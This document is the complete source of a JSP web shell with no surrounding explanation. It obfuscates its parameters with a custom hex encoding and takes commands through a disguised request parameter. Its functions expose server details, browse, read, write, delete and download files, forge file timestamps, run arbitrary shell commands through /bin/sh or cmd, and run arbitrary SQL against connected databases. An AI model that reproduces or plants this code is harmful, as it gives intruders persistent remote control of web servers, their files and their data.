as

1. <%@ page contentType="text/html;charset=utf8"%><%@ page import="java.io.*,java.util.*,java.text.*,java.sql.*"%><%!String P(String s)throws Exception{StringBuffer sb=new StringBuffer("");for(int i=0;i<s.length();i++){int c=(int)s.charAt(i);String t=Integer.toHexString(c);switch(t.length()){case 1:case 3:sb.append("O0"+t);break;case 2:case 4:sb.append("O"+t);break;default:break;}}return sb.toString();}String Q(String s)throws Exception{StringBuffer sb=new StringBuffer("");String a[]=s.split("O");for(int i=0;i<a.length;i++){char[] b=new char[(a[i].length()==2)?(a[i].length()/2):(a[i].length()/4)];for(int j=0;j<b.length;j++){b[j]=(char)(Integer.parseInt(a[i],16)); }sb.append(new String(b));}return sb.toString();}String I0(HttpServletRequest r)throws Exception{String b="\n";StringBuffer s=new StringBuffer("");Properties p=new Properties(System.getProperties());ServletContext c=r.getSession().getServletContext();s.append("1:"+r.getServerName()+" - (");try{s.append(java.net.InetAddress.getLocalHost().getHostAddress());}catch(Exception e){s.append("null");}s.append(")"+b);s.append("3:"+p.getProperty("os.name")+" - "+p.getProperty("os.version")+b);s.append("5:"+(new java.util.Date()).toString()+b);s.append("6:"+c.getServerInfo()+b);s.append("8:"+p.getProperty("java.vm.version")+b);s.append("9:"+p.getProperty("java.home")+b);s.append("10:"+p.getProperty("user.name")+b);s.append("11:"+p.getProperty("user.dir")+b);String t=c.getRealPath("/");if(t==null){t=c.getResource("/").getPath();}s.append("12:"+(new File(t)).getAbsolutePath()+b);t=c.getRealPath(r.getServletPath());if(t==null){t=c.getResource(r.getServletPath()).getPath();}s.append("13:"+(new File(t)).getAbsolutePath()+b);return s.toString();}String A1(String s)throws Exception{File a=new File(s);if(!a.exists()||a.isFile()){return "ER2";}StringBuffer b=new StringBuffer("");StringBuffer c=new StringBuffer("");File d[]=a.listFiles();for (int i=0;i<d.length;i++){String e=(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss")).format(new java.util.Date(d[i].lastModified()));String f=(d[i].isHidden()?"h":"-")+(d[i].canRead()?"r":"-")+(d[i].canWrite()?"w":"-");if (d[i].isDirectory()) {b.append(d[i].getName()+"/\t"+e+"\t0\t"+f+"\n");}else{c.append(d[i].getName()+"\t"+e+"\t"+d[i].length()+"\t"+f+"\n");}}return b.toString()+c.toString();}String A2(String s)throws Exception{File d=new File(s);if(d.exists()){return "ER3";}if(d.mkdir()){return "OK";}else{return "ER1";} }String A3(String s)throws Exception{File a=new File(s);if(!a.exists()||a.isFile()){return "ER2";}File b[]=a.listFiles();for (int i=0;i<b.length; i++){if (b[i].isDirectory()){A3(s+File.separator+b[i].getName());b[i].delete();}else{b[i].delete();}}a.delete();return "OK";}String A4(String s1, String s2)throws Exception{File a=new File(s1);if(!a.exists()||a.isFile()){return "ER2";}File b=new File(s2);if(!b.exists()&&!b.mkdir()){return "ER1";}File c[]=a.listFiles();for (int i=0;i<c.length;i++){if (c[i].isDirectory()){A4(s1+File.separator+c[i].getName(),s2+File.separator+c[i].getName());c[i].delete();}else{File d=new File(s2+File.separator+c[i].getName());c[i].renameTo(d);} }a.delete();return "OK";}String A5(String s1,String s2)throws Exception{File sf=new File(s1);if(!sf.exists()||sf.isFile()){return "ER2";}File df=new File(s2);if(!df.exists()&&!df.mkdir()){return "ER1";}File l[]=sf.listFiles();for (int i=0;i<l.length;i++){if (l[i].isDirectory()){A5(s1+File.separator+l[i].getName(),s2+File.separator+l[i].getName());}else{FileInputStream is=new FileInputStream(new File(s1+File.separator+l[i].getName()));FileOutputStream os=new FileOutputStream(new File(s2+File.separator+l[i].getName()));int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();} }return "OK";}String A6()throws Exception{StringBuffer sb=new StringBuffer("");if(System.getProperties().getProperty("java.home").charAt(0)=='/'){sb.append("/");}else{File A[]=File.listRoots();for(int i=0;i<A.length;i++){sb.append(A[i].toString().substring(0,2));}}return sb.toString();}String B1(String s)throws Exception{File sf=new File(s);if(!sf.exists()||!sf.isFile()){return "ER4";}if(sf.length()>1048576){return "ER6";}int i;StringBuffer sb=new StringBuffer("");BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(s)));while((i=br.read())!=-1){sb.append((char)i);}br.close();return sb.toString();}String B2(String s,String c)throws Exception{BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(s))));bw.write(c);bw.close();return "OK";}String B3(String s)throws Exception{File d=new File(s);if(!d.exists()||!d.isFile()){return "ER4";}if(d.delete()){return "OK";}else{return "ER1";}}String B4(String s,String d)throws Exception{File sf=new File(s);if(!sf.exists()||!sf.isFile()){return "ER4";}File df=new File(d);sf.renameTo(df);return "OK";}String B5(String s,String d)throws Exception{File sf=new File(s);if(!sf.exists()||!sf.isFile()){return "ER4";}File df=new File(d);FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();return "OK";}void B6(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[204800];r.reset();File sf=new File(s);ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));if(!sf.exists()||!sf.isFile()){os.write(("File not found").getBytes(),0,14);return;}String h="12345678"+String.valueOf(sf.length())+":";os.write(h.getBytes(),0,h.length());while((n=is.read(b,0,204800))!=-1) {os.write(b,0,n);}is.close();os.close(); }String B7(String s,String c,String p)throws Exception{String h="0123456789abcdef";long n=Long.valueOf(p).longValue();File f=new File(s);RandomAccessFile raf=new RandomAccessFile(f,"rw");raf.seek(n); for(int i=0;i<c.length();i+=2){raf.write((h.indexOf(c.charAt(i))<<4|h.indexOf(c.charAt(i+1))));}raf.close();return "OK";}String B8(String s,String t)throws Exception{File f=new File(s);if(!f.exists()){return "ER4";}java.text.SimpleDateFormat fm=new java.text.SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);if(f.setLastModified(dt.getTime())){return "OK";}else{return "ER1";}}String C1(String s,String e)throws Exception{StringBuffer sb=new StringBuffer("");String[] c=new String[3];boolean l=(System.getProperties().getProperty("java.home").charAt(0)=='/');c[0]=(e!=null&&e.trim().length()>0)?e:(l?"/bin/sh":"cmd");c[1]=l?"-c":"/c";c[2]=s;Process p=Runtime.getRuntime().exec(c);BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));int i;while((i=br.read())!=-1){sb.append((char)i);}br=new BufferedReader(new InputStreamReader(p.getErrorStream()));while((i=br.read())!=-1){sb.append((char)i);}return sb.toString();}String D1(String s)throws Exception{String A[]=s.trim().split("\\|\\|",4);if(A.length<2){return "ER7";}if(T(A[0].trim())){Class.forName(A[0].trim());}else{return "ER11";}StringBuffer B=new StringBuffer("");Connection C;if(A.length==4){C=DriverManager.getConnection(A[1].trim(),A[2].trim(),A[3].trim());}else{C=DriverManager.getConnection(A[1].trim());}DatabaseMetaData D=C.getMetaData();ResultSet E=D.getCatalogs();if(E.next()){E=D.getCatalogs();}else{E=D.getSchemas();}while(E.next()){B.append(E.getString(1)+"\t");}if(B.length()==0){B.append(A[1].substring(A[1].lastIndexOf(":")+1).trim());}E.close();C.close();return B.toString();}String D2(String s1,String s2)throws Exception{String A[]=s1.trim().split("\\|\\|",4);if(A.length<2){return "ER7";}if(T(A[0].trim())){Class.forName(A[0].trim());}else{return "ER11";}StringBuffer B=new StringBuffer("");Connection C;if(A.length==4){C=DriverManager.getConnection(A[1].trim(),A[2].trim(),A[3].trim());}else{C=DriverManager.getConnection(A[1].trim());}C.setCatalog(s2);DatabaseMetaData D=C.getMetaData();ResultSet E=D.getTables(null,null,"%",new String[]{"TABLE"});while(E.next()){B.append(E.getString("TABLE_NAME")+"\t");}E.close();C.close();return B.toString();}String D3(String s1,String s2,String s3)throws Exception{String A[]=s1.trim().split("\\|\\|",4);if(A.length<2){return "ER7";}if(T(A[0].trim())){Class.forName(A[0].trim());}else{return "ER11";}StringBuffer B=new StringBuffer("");Connection C;if(A.length==4){C=DriverManager.getConnection(A[1].trim(),A[2].trim(),A[3].trim());}else{C=DriverManager.getConnection(A[1].trim());}C.setCatalog(s2);ResultSet D=C.prepareStatement("SELECT * FROM "+s3).executeQuery();ResultSetMetaData E=D.getMetaData();for(int i=1;i<=E.getColumnCount();i++){B.append(E.getColumnName(i)+" ("+E.getColumnTypeName(i)+")\t");}D.close();C.close();return B.toString();}String D4(String s1,String s2,String s3)throws Exception{String A[]=s1.trim().split("\\|\\|",4);if(A.length<2){return "ER7";}if(T(A[0].trim())){Class.forName(A[0].trim());}else{return "ER11";}StringBuffer B=new StringBuffer("");Connection C;if(A.length==4){C=DriverManager.getConnection(A[1].trim(),A[2].trim(),A[3].trim());}else{C=DriverManager.getConnection(A[1].trim());}C.setCatalog(s2);Statement D=C.createStatement();if(D.execute(s3)){ResultSet E=D.getResultSet();ResultSetMetaData F=E.getMetaData();int G=F.getColumnCount();for(int i=1;i<=G;i++){B.append(F.getColumnName(i)+"\t|\t");}B.append("\n");while(E.next()){for(int j=1;j<=G;j++){String H=E.getString(j);if(H==null){H="";}B.append(H+"\t|\t");}B.append("\n");}E.close();}else{B.append("OK");}D.close();C.close();return B.toString();}boolean T(String s)throws Exception{try{Class.forName(s);return true;}catch(Exception e){return false;}}%><%try{String q=request.getParameter("!Qweq!@#");q=Q(q);String p[]=q.trim().split(":");if(p.length<6){out.close();}String R="",p1="",p2="",p3="";p1=request.getParameter(p[1]);p2=request.getParameter(p[2]);;p3=request.getParameter(p[3]);;if(p[0].equals("I0")){R=I0(request);}else if(p[0].equals("A1")){R=A1(Q(p1));}else if(p[0].equals("A2")){R=A2(Q(p1));}else if(p[0].equals("A3")){R=A3(Q(p1));}else if(p[0].equals("A4")){R=A4(Q(p1),Q(p2));}else if(p[0].equals("A5")){R=A5(Q(p1),Q(p2));}else if(p[0].equals("A6")){R=A6();}else if(p[0].equals("B1")){R=B1(Q(p1));}else if(p[0].equals("B2")){R=B2(Q(p1),Q(p2));}else if(p[0].equals("B3")){R=B3(Q(p1));}else if(p[0].equals("B4")){R=B4(Q(p1),Q(p2));}else if(p[0].equals("B5")){R=B5(Q(p1),Q(p2));}else if(p[0].equals("B6")){B6(Q(p1),response);out.close();}else if(p[0].equals("B7")){R=B7(Q(p1),p2,Q(p3));}else if(p[0].equals("B8")){R=B8(Q(p1),Q(p2));}else if(p[0].equals("C1")){R=C1(Q(p1),Q(p2));}else if(p[0].equals("D1")){R=D1(Q(p1));}else if(p[0].equals("D2")){R=D2(Q(p1),Q(p2));}else if(p[0].equals("D3")){R=D3(Q(p1),Q(p2),Q(p3));}else if(p[0].equals("D4")){R=D4(Q(p1),Q(p2),Q(p3));}if(p.length>6 && p[6].equals("1")){R=P(R);}if(R.length()>0){out.print(p[4]+R+p[5]);}}catch(Exception e){out.print(e.toString());}%>